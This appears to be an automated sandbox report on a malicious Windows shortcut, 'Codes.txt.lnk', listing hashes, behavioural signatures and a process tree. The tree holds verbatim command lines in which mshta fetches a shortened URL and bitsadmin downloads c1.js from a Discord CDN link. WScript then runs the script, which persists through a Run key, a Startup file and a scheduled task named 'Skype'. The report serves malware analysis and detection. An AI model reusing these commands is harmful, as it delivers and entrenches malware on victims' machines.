Analysis
- max time kernel: 1793s
- max time network: 1799s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 02-08-2021 20:16
Static task: static1
Behavioral task: behavioral1
  Sample: Codes.txt.lnk
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: Codes.txt.lnk
  Resource: win10v20210410
General
- Target: Codes.txt.lnk
- Size: 1KB
- MD5: 537399896538f5897c325a350603a567
- SHA1: 0a2ff41a38f91f79dde2a579138396bc5e5a7378
- SHA256: 91b660e99b14d4d790953f9db3ba34d046d494624b53f53ef646fab40c64ace2
- SHA512: fb61b629d1ba6c38164bf21a637a28dc741fe29df47ae81af0e448273b30a60504085f94ee3d31e981ca9d23ba7517a13ac4a8a4e805a13999d67bd29daec030
Malware Config
- Extracted: https://bit.ly/3j6OXnh
Signatures
- Blocklisted process makes network request (6 IoCs)
  Processes: mshta.exe, WScript.exe, WScript.exe
  flow 7:  pid 1064  mshta.exe
  flow 9:  pid 1064  mshta.exe
  flow 11: pid 1064  mshta.exe
  flow 13: pid 1064  mshta.exe
  flow 17: pid 1536  WScript.exe
  flow 21: pid 1864  WScript.exe
- Drops startup file (2 IoCs)
  Processes: WScript.exe, WScript.exe
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js (WScript.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js (WScript.exe)
- Adds Run key to start application (2 TTPs, 4 IoCs)
  Processes: WScript.exe, WScript.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\JJM3W6LMN3 = "\"C:\\Users\\Admin\\AppData\\Roaming\\c1.js\"" (WScript.exe)
  Key created: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run (WScript.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\JJM3W6LMN3 = "\"C:\\Users\\Admin\\AppData\\Roaming\\c1.js\"" (WScript.exe)
  Key created: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run (WScript.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Download via BitsAdmin (1 TTPs, 1 IoCs)
- Modifies Internet Explorer settings
  Processes: mshta.exe
  Key created: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
- Modifies system certificate store
  Processes: mshta.exe
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 (mshta.exe)
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = <certificate blob omitted> (mshta.exe)
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = <certificate blob omitted> (mshta.exe)
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes: cmd.exe, mshta.exe, WScript.exe, taskeng.exe, WScript.exe
  PID 1608 (cmd.exe) wrote to memory of 1064 (mshta.exe)
  PID 1608 (cmd.exe) wrote to memory of 1064 (mshta.exe)
  PID 1608 (cmd.exe) wrote to memory of 1064 (mshta.exe)
  PID 1064 (mshta.exe) wrote to memory of 744 (bitsadmin.exe)
  PID 1064 (mshta.exe) wrote to memory of 744 (bitsadmin.exe)
  PID 1064 (mshta.exe) wrote to memory of 744 (bitsadmin.exe)
  PID 1064 (mshta.exe) wrote to memory of 1536 (WScript.exe)
  PID 1064 (mshta.exe) wrote to memory of 1536 (WScript.exe)
  PID 1064 (mshta.exe) wrote to memory of 1536 (WScript.exe)
  PID 1536 (WScript.exe) wrote to memory of 608 (schtasks.exe)
  PID 1536 (WScript.exe) wrote to memory of 608 (schtasks.exe)
  PID 1536 (WScript.exe) wrote to memory of 608 (schtasks.exe)
  PID 1476 (taskeng.exe) wrote to memory of 1864 (WScript.exe)
  PID 1476 (taskeng.exe) wrote to memory of 1864 (WScript.exe)
  PID 1476 (taskeng.exe) wrote to memory of 1864 (WScript.exe)
  PID 1864 (WScript.exe) wrote to memory of 1528 (schtasks.exe)
  PID 1864 (WScript.exe) wrote to memory of 1528 (schtasks.exe)
  PID 1864 (WScript.exe) wrote to memory of 1528 (schtasks.exe)
Processes (process tree, indented by depth)
C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Codes.txt.lnk
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" "https://bit.ly/3j6OXnh"
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\bitsadmin.exe
      Command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://cdn.discordapp.com/attachments/870779144429006911/870824147524157480/c1.js C:\Users\Admin\AppData\Local\Temp\c1.js
      - Download via BitsAdmin
    C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1.js"
      - Blocklisted process makes network request
      - Drops startup file
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
      C:\Windows\System32\schtasks.exe
        Command line: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\c1.js
        - Creates scheduled task(s)
C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {7D67F7E4-C1D3-47BC-8A75-31D0329D11B1} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WScript.exe
    Command line: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\c1.js"
    - Blocklisted process makes network request
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\c1.js
      - Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js
  MD5: 8759dd865b3c3ac8ad0886c94755be9e
  SHA1: cc9a1cdf0622343f4971f3dab67279a1df403770
  SHA256: 5b54ba3fc3b226af7f7a96b511338028ca481c56304b724b7d95335bfa159efc
  SHA512: 957e0f85f4f0667c2bfb7b472e68de58fac21cdc22ac7e3fc8c6ccb7213f147fff351ea9b81c4249000c1bf7fa07f72ee4d5ffae71543765c8d5f6701d15ccab
- C:\Users\Admin\AppData\Roaming\c1.js
  MD5: a0f6fb7fa7c1cfcdbbfc67d307c74083
  SHA1: 58341f91d689f92a4a6918437d753deda79ebf4f
  SHA256: 59f8cd4a8082917464fa030dbf1bc90f99d12f30fc4ba6cd3723db42ca9b12f7
  SHA512: 5971476bc95241d03fe173a9f253eacc1c9efc8af065b71e32b31d221efe82f892c372fa8851dd61b86593bc776255ef9c664a15cf4549f9048eee69a3cc4873
- memory/608-65-0x0000000000000000-mapping.dmp
- memory/744-62-0x0000000000000000-mapping.dmp
- memory/1064-61-0x0000000000000000-mapping.dmp
- memory/1528-70-0x0000000000000000-mapping.dmp
- memory/1536-63-0x0000000000000000-mapping.dmp
- memory/1608-60-0x000007FEFB631000-0x000007FEFB633000-memory.dmp
  Filesize: 8KB
- memory/1864-67-0x0000000000000000-mapping.dmp